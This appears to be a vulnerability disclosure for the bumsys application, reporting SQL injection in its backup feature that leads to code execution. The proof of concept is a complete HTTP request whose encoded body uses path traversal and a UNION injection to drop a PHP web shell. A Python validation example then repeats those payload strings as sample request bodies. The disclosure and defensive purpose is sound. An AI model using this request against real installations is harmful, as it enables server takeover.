SQL Injection leads to code execution in unilogies/bumsys
Reported on
Feb 28th 2023
Description
This vulnerability allows an attacker to leverage a SQL injection in the database backup functionality to write arbitrary data to an arbitrary file on disk, anywhere the user can write. In a default installation this includes the webroot, allowing the attacker to place a web shell in a location they can reach through the server.
Proof of Concept
This vulnerability requires an active session for an account. The cookies and the CSRF token in the HTTP request below need to be replaced with those of that session. The request places a file called shell.php in the webroot, where the attacker can access it via http://localhost:8081/shell.php?c=id to execute the id command.
POST /xhr/?module=settings&page=generateDatabaseBackup HTTP/1.1
Host: localhost:8081
sec-ch-ua: "Not A(Brand";v="24", "Chromium";v="110"
X-CSRF-TOKEN: 4a07ceabd1734243fbd0a9cf714b65452551f0e6
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-platform: "Windows"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8081/home/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: CRM-40d1b2d83998fabacb726e5bc3d22129=12j4f7uk8bi3o77pun4dd7e3hd; __f8b4221bcc40754ca24ed6adc27973c785a8e4cd=db3fd51122bad08f449fc62eee05da13; eid=1
Connection: close
Content-Length: 180
backupFormat=%2f..%2f..%2f..%2fshell.php&backupName=a&selectedTable[0]=time_dimension%20where%201%3d2%20union%20all%20select%20'%3c%3fphp%20echo%20%60%24_GET%5bc%5d%60%3b%20%3f%3e'
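Server-side validation that closes both holes the request above abuses, written here as an added example in Python rather than the project's PHP (this is not bumsys code): the table list is matched against names that exist in the database and the format against a fixed allowlist, so neither parameter can carry SQL or a path. KNOWN_TABLES, ALLOWED_FORMATS, BACKUP_DIR and the sample request bodies are constructed assumptions.

```python
import os
import re
from urllib.parse import parse_qs

# Constructed stand-ins for SHOW TABLES output and supported formats (assumptions).
KNOWN_TABLES = frozenset({"time_dimension", "customers", "orders"})
ALLOWED_FORMATS = {"sql": ".sql", "csv": ".csv"}
BACKUP_DIR = os.path.abspath("backups")
# Whole-string identifier match, so "time_dimension where 1=2 union ..." fails.
IDENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]{0,63}$")


def validate_backup_request(body: str) -> dict:
    """Parse the form body; raise ValueError on any value that could pick the
    output location or reach the per-table dump query as SQL."""
    params = parse_qs(body, keep_blank_values=True)
    fmt = params.get("backupFormat", [""])[0]
    if fmt not in ALLOWED_FORMATS:  # rejects "/../../../shell.php" outright
        raise ValueError(f"unsupported backupFormat: {fmt!r}")
    name = params.get("backupName", [""])[0]
    if not IDENT_RE.match(name):
        raise ValueError(f"invalid backupName: {name!r}")
    # Build the path from validated parts only, then confirm it stayed inside.
    path = os.path.abspath(os.path.join(BACKUP_DIR, name + ALLOWED_FORMATS[fmt]))
    if os.path.dirname(path) != BACKUP_DIR:
        raise ValueError("backup path escapes the backup directory")
    # selectedTable[0], selectedTable[1], ... arrive as separate form keys.
    tables = [v for k, vs in params.items() if k.startswith("selectedTable[") for v in vs]
    if not tables:
        raise ValueError("no tables selected")
    for t in tables:
        # Identifiers cannot be bound as parameters: check shape, then existence.
        if not IDENT_RE.match(t) or t not in KNOWN_TABLES:
            raise ValueError(f"unknown table: {t!r}")
    return {"format": fmt, "path": path, "tables": tables}


def rejection_reason(body: str):
    """Return the validation error for a request body, or None if accepted."""
    try:
        validate_backup_request(body)
    except ValueError as exc:
        return str(exc)
    return None


# Constructed request bodies: a legitimate backup, then the two abuse patterns.
GOOD_BODY = "backupFormat=sql&backupName=nightly&selectedTable[0]=orders&selectedTable[1]=customers"
TRAVERSAL_BODY = "backupFormat=%2f..%2f..%2f..%2fshell.php&backupName=a&selectedTable[0]=orders"
INJECTION_BODY = "backupFormat=sql&backupName=a&selectedTable[0]=time_dimension%20where%201%3d2%20union%20all%20select%20'x'"
```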
Impact
Remote code execution
Occurrences
Good finding. Will fix soon. Thank you.
Hello, we have already transferred the backup system to module/settings/backup.php#L12. Could you please confirm whether the issue still exists? Thank you.
Just checked this against the most recent commit and the exploit still works as described.